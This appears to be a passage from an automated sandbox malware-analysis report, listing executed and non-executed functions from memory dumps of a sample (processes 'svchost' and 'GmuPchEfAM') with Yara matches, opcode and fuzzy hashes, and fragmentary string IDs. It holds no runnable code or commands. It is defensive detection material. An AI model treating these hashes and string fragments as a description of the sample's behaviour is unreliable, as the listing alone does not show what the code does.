                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction ID: 7fd76f46543c12adfd7659b1382698188c3b6ebd446de7a33aac0e7674ebad32
                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction Fuzzy Hash: C191A670E002599FDF24DE69C982ABEB7B5EF44328F1845BAE875EB2C0DF3099418750
                                                                                                              Function 03B39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 075b8bf7e9bcc10ff6b3cdbf201dd5f7294661f2159b5051153c1afd90195c58
                                                                                                              • Instruction ID: 82c12e0482d66d7cbfdc34f74bcfc94d7ed0be57b6bae771ccada254ecd95eaa
                                                                                                              • Opcode Fuzzy Hash: 075b8bf7e9bcc10ff6b3cdbf201dd5f7294661f2159b5051153c1afd90195c58
                                                                                                              • Instruction Fuzzy Hash: 9A811C76D00269ABDB31DF54CC44BEEB7B8AB08714F0445EAA919BB240D7709E84CFA4
                                                                                                              Function 03BBCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 03BBCFBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallFilterFunc@8
                                                                                                              • String ID: @$@4_w@4_w
                                                                                                              • API String ID: 4062629308-713214301
                                                                                                              • Opcode ID: 84e272bcf98550c3dfbbfc59e5f3961fb4a316d43ad329425e1446f928d82500
                                                                                                              • Instruction ID: 3ccdf44f3ccaa5f7417287a8a130716170ed81898fdc2d3e2858e032975fe3e3
                                                                                                              • Opcode Fuzzy Hash: 84e272bcf98550c3dfbbfc59e5f3961fb4a316d43ad329425e1446f928d82500
                                                                                                              • Instruction Fuzzy Hash: 9041A079900268DFCB21DF95D880ABDBBB8EF45B08F0440BAE915DF254DBB8D801DB64

                                                                                                              Executed Functions

                                                                                                              Function 026FF945 Relevance: .1, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ec4b831c1d93eca117ca1763b67569b88bfb09439638302efb7741afbe7a954
                                                                                                              • Instruction ID: 29e7732753eb46b6bd0168647918c63eec959d5d555976315175888543249bed
                                                                                                              • Opcode Fuzzy Hash: 7ec4b831c1d93eca117ca1763b67569b88bfb09439638302efb7741afbe7a954
                                                                                                              • Instruction Fuzzy Hash: 473192516593F14ED31E836D08B9675AEC28E5720174EC2EEDADA5F3F3C4888418D3A5
                                                                                                              Function 026FF095 Relevance: 19.2, Strings: 15, Instructions: 449COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: +$+$7`$7b$8s$?4$@/$AR$R#$X{$]s$mx$#$0$W
                                                                                                              • API String ID: 0-242658730
                                                                                                              • Opcode ID: bfd7e4a24592bd7015e017b5e75a20342386f33b28074c7438c4682e67e0c52a
                                                                                                              • Instruction ID: 4ae00280160cb09d56ce6daf526f96f450a161352d7c998758bdb7b20a0b732d
                                                                                                              • Opcode Fuzzy Hash: bfd7e4a24592bd7015e017b5e75a20342386f33b28074c7438c4682e67e0c52a
                                                                                                              • Instruction Fuzzy Hash: A632D1B0E05229CFEF68CF48C894BDDBBB2BB45308F1081D9D24A6B691C7B45A85CF55
                                                                                                              Function 0270CCB4 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$O$S$\$s
                                                                                                              • API String ID: 0-3854637164
                                                                                                              • Opcode ID: c9f619caed60f455358edb34389dd25a3ffdb8fa7d007ae0ba7c9ed086d18bdc
                                                                                                              • Instruction ID: df0417de1e1a18d2994b6f935cc3d8bc20d7f14f95861fe49398242c477f436e
                                                                                                              • Opcode Fuzzy Hash: c9f619caed60f455358edb34389dd25a3ffdb8fa7d007ae0ba7c9ed086d18bdc
                                                                                                              • Instruction Fuzzy Hash: 885180B2900218ABDB11DB94DC89BFFB7B9EF84715F04429EEA0866140E7715A48CBE1
                                                                                                              Function 0271B354 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: m@
                                                                                                              • API String ID: 0-3881191045
                                                                                                              • Opcode ID: 928ec9c39d4695fef8eaa6e3c5b1892d010bf2bb751cca70bf27b5bd25d8b393
                                                                                                              • Instruction ID: 300bb5b91ec7d8cb5570b2897c861b6c555f5f9fd9a04932830dc7dd0b6416a8
                                                                                                              • Opcode Fuzzy Hash: 928ec9c39d4695fef8eaa6e3c5b1892d010bf2bb751cca70bf27b5bd25d8b393
                                                                                                              • Instruction Fuzzy Hash: FC114FB6D01218AF8F00DFA8D8419EEB7FDEF49200F00456EE919E7200E7705A14CFA0
                                                                                                              Function 026F8B56 Relevance: .1, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82044efb7b3044086d251d07397f21b1e3a51781aca188c7b0c639f39e226edf
                                                                                                              • Instruction ID: a483fd728a76710687f17b1e9de85de53b455d97175f4c48888f70c97115b3d3
                                                                                                              • Opcode Fuzzy Hash: 82044efb7b3044086d251d07397f21b1e3a51781aca188c7b0c639f39e226edf
                                                                                                              • Instruction Fuzzy Hash: C84110B1D11219AFDB54CF99CC85AEEBBBCEF49710F10415AFA18A7240E7B19640CFA4
                                                                                                              Function 0271D604 Relevance: .1, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: adeb6e28f56624000e4b44dc8ce22128b89f21619587f388f736c88704acb40f
                                                                                                              • Instruction ID: d5a6ae51ebe2beb84f9c70d1cd22348b94cf07be16b013a4aaed6193739ae6c7
                                                                                                              • Opcode Fuzzy Hash: adeb6e28f56624000e4b44dc8ce22128b89f21619587f388f736c88704acb40f
                                                                                                              • Instruction Fuzzy Hash: F831FCB5A04249ABDB14DF99C881EDFB7F9EF88700F104119F918A7340D775A915CFA1
                                                                                                              Function 0271DF44 Relevance: .1, Instructions: 77COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b77a3c8a19fb138712cda3b56009b77642c78c59072e0705b8171aa64af1e55
                                                                                                              • Instruction ID: 8f464a5afcae734ebd31d5b737d25629c3a12023451649258fb3a6dcfff4fede
                                                                                                              • Opcode Fuzzy Hash: 5b77a3c8a19fb138712cda3b56009b77642c78c59072e0705b8171aa64af1e55
                                                                                                              • Instruction Fuzzy Hash: 8E21E9B5A00309AFDB24DF98C885EAFB7B9EF88700F104509FA189B640D775A915CBA5
                                                                                                              Function 0270CAF4 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 85f73075fe8bed793ae7f4fdfef0e686cfa9c13396cd3f39dda9257829d770b8
                                                                                                              • Instruction ID: fd563c9fe07d04489f367a0dae1c93de8c8003ddeb9cf4debc6d1907fe261b55
                                                                                                              • Opcode Fuzzy Hash: 85f73075fe8bed793ae7f4fdfef0e686cfa9c13396cd3f39dda9257829d770b8
                                                                                                              • Instruction Fuzzy Hash: 421186723802157BF7319A598C86FAB775D9F84B54F244015FB08AF2C0E6B5B8115AB4
                                                                                                              Function 0271D2A4 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1dd38516ecd52c17ab181145bd66e6f9ce6661cef741ffd7b3d208d70e0ea282
                                                                                                              • Instruction ID: 1be94d4f5bc18091cf7b4cff212965eb670a53cbd8c0e37e34c332d00c927826
                                                                                                              • Opcode Fuzzy Hash: 1dd38516ecd52c17ab181145bd66e6f9ce6661cef741ffd7b3d208d70e0ea282
                                                                                                              • Instruction Fuzzy Hash: 39112E71604344ABEB20EF98CC85FAF77ADEF85700F10450DFA199B240E7756915CBA5
                                                                                                              Function 0271A014 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 58f39cb73b3942429273f1e752487f1f71a9cb4b27d63897955bd151d36547a9
                                                                                                              • Instruction ID: 9ee3162078fd66f4d60c867276baf9b909626b42a3650e368e8d18bdee8ef64f
                                                                                                              • Opcode Fuzzy Hash: 58f39cb73b3942429273f1e752487f1f71a9cb4b27d63897955bd151d36547a9
                                                                                                              • Instruction Fuzzy Hash: 9D212EB6D01218AF8B00DFA8D8409EFB7F9EF88210F04425AEA19E7200E7715A04CBE0
                                                                                                              Function 0271D414 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7962991370096c6212c41e2be8176a7b6f634f738050e019efe5e6de47d638e6
                                                                                                              • Instruction ID: 60789cc2ac1a93a6e0d039a99cd03af81c2fd0e43a9e4e3fc173e8e5d5b11853
                                                                                                              • Opcode Fuzzy Hash: 7962991370096c6212c41e2be8176a7b6f634f738050e019efe5e6de47d638e6
                                                                                                              • Instruction Fuzzy Hash: 33115E71604354ABEB21EFA8CC45FAF77ADEF89710F10450DFE189B280E6716905CBA5
                                                                                                              Function 026F8B5A Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3782fc34d3ef260a7827a859b4082cc537dd076e2a9f308fbd0b18b8e7e47274
                                                                                                              • Instruction ID: 552f520072fac300899d3ae82890d348ab5bd24ce1183926aa703c953db8f8d9
                                                                                                              • Opcode Fuzzy Hash: 3782fc34d3ef260a7827a859b4082cc537dd076e2a9f308fbd0b18b8e7e47274
                                                                                                              • Instruction Fuzzy Hash: 6D11C9B1C25229AFCF44CFA9D88459EBBF8FB49620B10825BE818E7300D37486418FD5
                                                                                                              Function 0271E294 Relevance: .0, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0e421169f0b9f482851f3df1d0618f3232e81252c8f5e669472ae3fc13f1c4c2
                                                                                                              • Instruction ID: 15ae239be96952a355c34a32099d45c24ee45eb2861dd8de09363f7e28b8759e
                                                                                                              • Opcode Fuzzy Hash: 0e421169f0b9f482851f3df1d0618f3232e81252c8f5e669472ae3fc13f1c4c2
                                                                                                              • Instruction Fuzzy Hash: F701C0B2214248BBCB44DF99DC81EDB77AEAF8C714F018208FA19E3241D630E8518BA4
                                                                                                              Function 02719F84 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d89eb34d5ba7c2d364a3639b77af2a367ae59a69e61df91c420fcde67a90750
                                                                                                              • Instruction ID: a3243cdab33f9397b39978f5b1c022e34a7abcc355af0d7993a4669f2a6b5af6
                                                                                                              • Opcode Fuzzy Hash: 0d89eb34d5ba7c2d364a3639b77af2a367ae59a69e61df91c420fcde67a90750
                                                                                                              • Instruction Fuzzy Hash: 1B0197B6C01219AFCF44DFE8D940AEEBBF9AB18600F14456EE915F3240F7755A048FA5
                                                                                                              Function 026F8CA8 Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d897c646702b7c179464a0d5d062e2fa18c15c1e857afb8825ae363ecedb471
                                                                                                              • Instruction ID: 0f2c6ceccdc5d3cb1dfbb1e1a3f5bf620af57e5f662a033cfe06a458e4b3d43f
                                                                                                              • Opcode Fuzzy Hash: 7d897c646702b7c179464a0d5d062e2fa18c15c1e857afb8825ae363ecedb471
                                                                                                              • Instruction Fuzzy Hash: DCF02B73511216ABDB105B6DEC41F87B78CEB85334F100322FA1C87340D671D45187A0
                                                                                                              Function 0270CCAD Relevance: .0, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b27a60185d3ba48cbf74664cb26bd285059d4e817de81ce6f4bff66b798e0fb9
                                                                                                              • Instruction ID: be546b5ddb0c97c063885e969960059c2e3a860e6c2b2242defa09e96a6c96bb
                                                                                                              • Opcode Fuzzy Hash: b27a60185d3ba48cbf74664cb26bd285059d4e817de81ce6f4bff66b798e0fb9
                                                                                                              • Instruction Fuzzy Hash: 2AF028A1808294AEDB16DBA4CCC8EEABF78EF89310F0443C9E80857591D7705A9ACB51
                                                                                                              Function 0271D514 Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3af898be606b6cbf8288ba9d3e0e5c49a6f0dff07d886502472aaf9fd6659417
                                                                                                              • Instruction ID: 02a607222470c5a70a47392982b7c9cc6344a2697fbc5cc57af881e59b2a6aff
                                                                                                              • Opcode Fuzzy Hash: 3af898be606b6cbf8288ba9d3e0e5c49a6f0dff07d886502472aaf9fd6659417
                                                                                                              • Instruction Fuzzy Hash: 95F08CB6204208BBDB10DF98DC80E9B77ADEFC8710F008008FA18A7240C230B9108BB0
                                                                                                              Function 0271E1B4 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f4b77f2273dec16019d8b920b36054b3065a8ee74ed619d9597814caa3e3fcfc
                                                                                                              • Instruction ID: 63c6fb2a740c0a24112e52fd28102fa9eaefa0940ad83b32cd1e0328d554b52b
                                                                                                              • Opcode Fuzzy Hash: f4b77f2273dec16019d8b920b36054b3065a8ee74ed619d9597814caa3e3fcfc
                                                                                                              • Instruction Fuzzy Hash: 09E06D722042447BDB14EE68DC41EDB33ADEF89710F004008FE18A7241C731B910CBB5
                                                                                                              Function 0270CC14 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dc84cc6ce4685be0d4ad46fc62284313a2e7392da998ddc9dedda31c2de62930
                                                                                                              • Instruction ID: 06276ca55f7921512b94640658a1ca447c44e074590aba66ebc7041ab46f1660
                                                                                                              • Opcode Fuzzy Hash: dc84cc6ce4685be0d4ad46fc62284313a2e7392da998ddc9dedda31c2de62930
                                                                                                              • Instruction Fuzzy Hash: 4CF0FE71815209EBDB18DF68D881BDEBBB5EB04320F20836EE8299B2C0D63597558B95
                                                                                                              Function 027200A4 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4db85aac16c09189425a4b93d3c7de411726292a50465b1d9af71dde2d0b8cc6
                                                                                                              • Instruction ID: e70bbf1752d0e0c6bbb532f644d43f3c57ad170f04156aafe3af6bb17da22c90
                                                                                                              • Opcode Fuzzy Hash: 4db85aac16c09189425a4b93d3c7de411726292a50465b1d9af71dde2d0b8cc6
                                                                                                              • Instruction Fuzzy Hash: F4E04F3664122427E635558A9C09F9B776DCBD2F60F050068FE08AB340E660A90486F5
                                                                                                              Function 0271DEB4 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ebf29b646508c508d37512dd22707bb04d2719e0d3e88c71623cf21526a7a6a3
                                                                                                              • Instruction ID: 5856c9a8bc993c3a98bc171cddae40e8e5b4de34cfc5badfb6b548abc60cc091
                                                                                                              • Opcode Fuzzy Hash: ebf29b646508c508d37512dd22707bb04d2719e0d3e88c71623cf21526a7a6a3
                                                                                                              • Instruction Fuzzy Hash: C8E04636214204BBDA20EA69DC40E9B77ADDFC9710F01441AFA1CA7242C671BA118BF0

                                                                                                              Non-executed Functions

                                                                                                              Function 0270FAF4 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                              • API String ID: 0-392141074
                                                                                                              • Opcode ID: c8c5b8f3dbb8c9806459ca7bfb11237f785226f1711b92582d1a4aa7f9b9a419
                                                                                                              • Instruction ID: 17fbfec857d153eb602124a77c747c4cb1f95b27b62c65f651bd761ec8b9655c
                                                                                                              • Opcode Fuzzy Hash: c8c5b8f3dbb8c9806459ca7bfb11237f785226f1711b92582d1a4aa7f9b9a419
                                                                                                              • Instruction Fuzzy Hash: EC712DB1D10728AFDB21DBA4CC84FEEB7BDAF54705F048199E608A7191EB7057488FA1
                                                                                                              Function 0270FAF3 Relevance: 16.4, Strings: 13, Instructions: 176COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                              • API String ID: 0-392141074
                                                                                                              • Opcode ID: 6a1f85fb0d3746401374ec699ba612cdc7b97562c048c55aa3b6da405c8a4aad
                                                                                                              • Instruction ID: 924575404d2f89ddf28ba9e2cae9d32b48f5c44c3635b142ee05f44443752f1c
                                                                                                              • Opcode Fuzzy Hash: 6a1f85fb0d3746401374ec699ba612cdc7b97562c048c55aa3b6da405c8a4aad
                                                                                                              • Instruction Fuzzy Hash: 6A612DB1D10728AFDB21DFA4CC84FEEB7B9AF54705F048199E608A6191EB705748CFA1